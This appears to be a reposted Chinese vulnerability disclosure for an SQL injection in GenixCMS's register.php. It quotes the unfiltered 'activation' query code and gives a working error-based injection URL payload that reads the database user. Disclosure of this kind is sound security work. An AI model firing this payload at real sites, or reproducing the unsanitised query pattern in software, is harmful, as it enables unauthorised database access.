GenixCMS某处SQL注入漏洞

admin
admin
admin
102195
文章
87
评论
2022年5月17日03:41:27评论42 views字数 536阅读1分47秒阅读模式

GenixCMS某处SQL注入漏洞

2016-03-22

#代码审计

#genixcms


GenixCMS介绍

GenixCMS一款简单和轻量级的移动商务内容管理系统,官网:http://genixcms.org/

漏洞原理

程序根目录下的register.php中,第116行到118行:

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

可以看到直接从网址获取activation并且没有经过任何过滤,直接带入了sql语句查询,故存在sql注入漏洞。

漏洞证明

注入payload如下:

http://genixcms.localhost/register.php?activation=1%27%20and%201=(updatexml(1,concat(0x23,(select%20user()),0x23),1))%23

465554565

TangScan插件

将在官方修复后发布。

FROM : hackersb | Author:王松

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日03:41:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GenixCMS某处SQL注入漏洞https://cn-sec.com/archives/1012869.html

发表评论

匿名网友 填写信息